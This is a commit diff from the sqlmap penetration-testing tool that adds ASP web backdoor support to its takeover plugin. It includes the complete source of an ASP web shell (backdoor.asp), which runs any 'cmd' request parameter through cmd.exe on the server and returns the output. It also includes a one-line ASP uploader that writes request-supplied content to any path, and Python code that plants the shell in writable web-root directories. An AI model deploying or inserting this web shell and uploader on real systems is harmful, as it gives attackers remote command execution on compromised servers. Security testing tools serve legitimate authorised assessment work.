Initial support for ASP web backdoor functionality

lib/request/connect.py

@@ -92,6 +92,9 @@ class Connect:
                 url = "%s?%s" % (url, params)
                 requestMsg += "?%s" % params
 
+            if post:
+                post = urlencode(post).replace("%%", "%")
+
         elif multipart:
             multipartOpener = urllib2.build_opener(multipartpost.MultipartPostHandler)
             conn = multipartOpener.open(url, multipart)

plugins/generic/takeover.py

@@ -113,15 +113,14 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
 
     def __webBackdoorInit(self):
         """
-        This method is used to write a PHP agent (cmd.php) on a writable
+        This method is used to write a web backdoor (agent) on a writable
         remote directory within the web server document root.
-        Such agent is written using the INTO OUTFILE MySQL DBMS
-        functionality
         """
 
         self.checkDbmsOs()
 
         backdoorUrl = None
+        language    = None
         kb.docRoot  = getDocRoot()
         directories = getDirs()
         directories = list(directories)
@@ -130,11 +129,44 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
         infoMsg = "trying to upload the uploader agent"
         logger.info(infoMsg)
 
-        # TODO: backdoor and uploader extensions must be the same as of
+        message  = "which web application language does the web server "
-        # the web application language in use
+        message += "support?\n"
-        backdoorName = "backdoor.php"
+        message += "[1] ASP\n"
+        message += "[2] PHP (default)\n"
+        message += "[3] JSP"
+
+        while True:
+            choice = readInput(message, default="2")
+
+            if not choice or choice == "2":
+                language = "php"
+
+                break
+
+            elif choice == "1":
+                language = "asp"
+
+                break
+
+            elif choice == "3":
+                # TODO: add also JSP backdoor/uploader support
+                errMsg  = "JSP web backdoor functionality is not yet "
+                errMsg += "implemented"
+                raise sqlmapUnsupportedDBMSException, errMsg
+
+                #language = "jsp"
+
+                #break
+
+            elif not choice.isdigit():
+                logger.warn("invalid value, only digits are allowed")
+
+            elif int(choice) < 1 or int(choice) > 3:
+                logger.warn("invalid value, it must be 1 or 3")
+
+        backdoorName = "backdoor.%s" % language
         backdoorPath = "%s/%s" % (paths.SQLMAP_SHELL_PATH, backdoorName)
-        uploaderName = "uploader.php"
+        uploaderName = "uploader.%s" % language
         uploaderStr  = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH, uploaderName))
 
         for directory in directories:
@@ -165,6 +197,7 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
             logger.info(infoMsg)
 
             # Upload the backdoor through the uploader agent
+            if language == "php":
                 multipartParams = {
                                     "upload":    "1",
                                     "file":      open(backdoorPath, "r"),
@@ -179,11 +212,29 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
 
                     continue
 
+            elif language == "asp":
+                backdoorRemotePath = "%s/%s" % (directory, backdoorName)
+                backdoorRemotePath = os.path.normpath(backdoorRemotePath)
+                backdoorContent = open(backdoorPath, "r").read()
+                postStr = "f=%s&d=%s" % (backdoorRemotePath, backdoorContent)
+                page, _ = Request.getPage(url=uploaderUrl, direct=True, post=postStr)
+
+                if "permission denied" in page.lower():
+                    warnMsg  = "unable to upload the backdoor through "
+                    warnMsg += "the uploader agent on '%s'" % directory
+                    logger.warn(warnMsg)
+
+                    continue
+
+            elif language == "jsp":
+                # TODO: add also JSP backdoor/uploader support
+                pass
+
             backdoorUrl = "%s/%s" % (baseUrl, backdoorName)
 
-            infoMsg  = "the backdoor has been successfully uploaded on "
+            infoMsg  = "the backdoor has probably been successfully "
-            infoMsg += "'%s', go with your browser to " % directory
+            infoMsg += "uploaded on '%s', go with your browser " % directory
-            infoMsg += "'%s' and enjoy it!" % backdoorUrl
+            infoMsg += "to '%s' and enjoy it!" % backdoorUrl
             logger.info(infoMsg)
 
             break

shell/backdoor.asp

@@ -0,0 +1,44 @@
+<!--
+
+ASP_KIT
+
+cmd.asp = Command Execution
+
+by: Maceo
+modified: 25/06/2003
+
+-->
+
+<%
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+szCMD = request("cmd")
+
+If (szCMD <> "") Then
+  szTempFile = "C:\" & oFileSys.GetTempName()
+  Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+  Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)
+  End If
+%>
+
+<HTML>
+<BODY>
+<FORM action="" method="GET">
+<input type="text" name="cmd" size=45 value="<%= szCMD %>">
+<input type="submit" value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+  If (IsObject(oFile)) Then
+    On Error Resume Next
+    Response.Write Server.HTMLEncode(oFile.ReadAll)
+    oFile.Close
+    Call oFileSys.DeleteFile(szTempFile, True)
+  End If
+%>
+</BODY>
+</HTML>

shell/uploader.asp

@@ -1 +1,2 @@
+<p><b>sqlmap backdoor uploader</b></p>
 <%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%>